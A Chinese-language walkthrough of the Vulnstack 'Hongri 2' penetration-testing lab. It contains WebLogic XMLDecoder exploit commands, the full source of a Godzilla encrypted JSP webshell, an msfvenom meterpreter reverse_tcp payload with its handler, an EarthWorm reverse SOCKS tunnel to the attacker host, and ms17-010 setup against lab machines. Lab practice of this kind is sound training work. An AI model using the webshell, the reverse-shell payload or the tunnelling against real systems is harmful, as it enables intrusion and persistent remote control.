红日二靶场

红日二靶场

  • 靶场的搭建
    • 配置环境
  • 一,信息收集
    • 1.网段探测
    • 2.端口扫描
  • 二,渗透测试
    • 1.漏洞发现
    • 2.漏洞利用
      • 1.上传木马文件
      • 2.生成哥斯拉木马文件
      • 3.连接哥斯拉
      • 4.生成msf恶意程序
      • 5.本机开启监听
      • 6.将生成的msf文件上传
    • 3.永恒之蓝漏洞
      • 1.EarthWorm隧道搭建
      • 2.ms17-010

靶场的搭建

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
红日二靶场_第1张图片

点击文件夹中的.vmx文件,进行打开
web靶机开始需要切换用户 de1ay/1qaz@WSX 登录
靶机密码都是1qaz@WSX
管理员Administrator/1qaz@WSX

配置环境

修改网络net模式的网段

红日二靶场_第2张图片

添加一个网络地址,仅主机模式,网段为10.10.10.0/24

红日二靶场_第3张图片

将三个靶机的都改为VMnet19,确定

红日二靶场_第4张图片

web靶机,要将快照转为1.3版本,然后做一下步骤

通过切换用户,使用de1ay/1qaz@WSX进入web靶机,修改密码,然后直接注销退出

红日二靶场_第5张图片
红日二靶场_第6张图片

进入web之后,C:\Oracle\Middleware\user_projects\domains\base_domain

红日二靶场_第7张图片

外网:192.168.111.0/24
内网:10.10.10.0/24

一,信息收集

1.网段探测

红日二靶场_第8张图片

192.168.111.80:web服务器地址
192.168.111.201:pc地址

2.端口扫描

危险端口
445:smb服务,可能存在ms17-010漏洞
1433:mssql服务,可能存在爆破,注入,弱口令等
3389:存在远程桌面
7001:weblogic服务

二,渗透测试

1.漏洞发现

使用weblogicscan扫描

工具地址:https://github.com/rabbitmask/WeblogicScan

2.漏洞利用

┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.80:7001
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
+----------------+------------------------------+-----------------------------------------------------------------+
|      Time      |             Status           |                                Host                             |
+----------------+------------------------------+-----------------------------------------------------------------+
|    01:55:07    |      [+] 漏洞存在            | http://192.168.111.80:7001/wls-wsat/test.logs
+----------------+------------------------------+-----------------------------------------------------------------+
                                                                                                                                                                                    
┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Success
[+] http://192.168.111.80:7001/wls-wsat/shell.jsp?password=secfree&command=whoami

成功上传,访问

红日二靶场_第9张图片

1.上传木马文件

挂代理,转包,将数据包中的恶意代码换成哥斯拉的jsp木马

vim /etc/proxychains4.conf
红日二靶场_第10张图片

先打开bp,抓包,然后运行下代码

┌──(root㉿kali)-[~/kali/Scan/WeblogicScan/CVE-2017-3506-master]
└─# proxychains4 java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  192.168.111.80:7001  ...  OK

红日二靶场_第11张图片

将【】中的数据换成哥斯拉的jsp

2.生成哥斯拉木马文件

红日二靶场_第12张图片

┌──(root㉿kali)-[~/kali/muma]
└─# cat pass.jsp 
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%> 

红日二靶场_第13张图片

3.连接哥斯拉

红日二靶场_第14张图片

红日二靶场_第15张图片

4.生成msf恶意程序

msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=7777 -f exe -o windows.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=7777 -f exe -o windows.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: windows.exe

5.本机开启监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp


msf6 exploit(multi/handler) > set lhost 192.168.111.128
lhost => 192.168.111.128

msf6 exploit(multi/handler) > set lport 7777
lport => 7777

msf6 exploit(multi/handler) > exploit

6.将生成的msf文件上传

红日二靶场_第16张图片红日二靶场_第17张图片

拿到meterpreter后
可以通过哥斯拉上传;也可以通过meterpreter中,upload命令上传
上传fscan.exe,扫描内网

C:\Oracle\Middleware\user_projects\domains\base_domain>.\fscan.exe -h 10.10.10.0/24
.\fscan.exe -h 10.10.10.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.1
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: An attempt was made to access a socket in a way forbidden by its access permissions.
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 10.10.10.1      is alive
(icmp) Target 10.10.10.10     is alive
(icmp) Target 10.10.10.80     is alive
[*] Icmp alive hosts len is: 3
10.10.10.10:445 open
10.10.10.1:445 open
10.10.10.80:139 open
10.10.10.10:88 open
10.10.10.80:7001 open
10.10.10.80:445 open
10.10.10.10:139 open
10.10.10.1:139 open
10.10.10.80:135 open
10.10.10.10:135 open
10.10.10.1:135 open
10.10.10.80:80 open
[*] alive ports len is: 12
start vulscan
[+] 10.10.10.80 MS17-010        (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] 10.10.10.1           WORKGROUP\ROOT              
[*] 10.10.10.80          DE1AY\WEB               Windows Server 2008 R2 Standard 7601 Service Pack 1
[+] NetInfo:
[*]10.10.10.1
   [->]root
   [->]192.168.26.1
   [->]192.168.56.1
   [->]192.168.41.1
   [->]192.168.111.1
   [->]10.10.10.1
   [->]192.168.0.107
[+] NetInfo:
[*]10.10.10.10
   [->]DC
   [->]10.10.10.10
[+] 10.10.10.10 MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] 10.10.10.10    [+]DC DE1AY\DC                Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://10.10.10.80        code:200 len:0      title:None
[*] WebTitle:http://10.10.10.80:7001   code:404 len:1164   title:Error 404--Not Found
[+] InfoScan:http://10.10.10.80:7001   [weblogic] 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2019-2729-1 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2020-14750 
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] http://10.10.10.80:7001 poc-yaml-weblogic-cve-2017-10271 echo
已完成 12/12
[*] 扫描结束,耗时: 22.7696667s
发现内网中有10.10.10.10主机存活,10.10.10.80就是这台主机有永恒之蓝漏洞

3.永恒之蓝漏洞

1.EarthWorm隧道搭建

git clone https://github.com/idlefire/ew.git

1.首先在本机上监听端口

添加代理端口
vim /etc/proxychains4.conf
socks5 127.0.0.1 7086

┌──(root㉿kali)-[~/tools/ew]
└─# ./ew_for_linux64 -s rcsocks -l 7086 -e 8523
rcsocks 0.0.0.0:7086 <--[10000 usec]--> 0.0.0.0:8523
init cmd_server_for_rc here
start listen port here

2.将ew_for_Win.exe上传到靶机

ew_for_Win.exe -s rssocks -d 192.168.111.128 -e 8523

2.ms17-010

search ms17-010
use 0
set rhost 10.10.10.80
setg proxies socks5:127.0.0.1:7086
set ReverseAllowProxy true

呃,到这应该是可以拿到meterpreter的,结果一直出错,一看靶机。。。。。

红日二靶场_第18张图片
没有保存快照,结束,不打了

你可能感兴趣的:(红日二,python)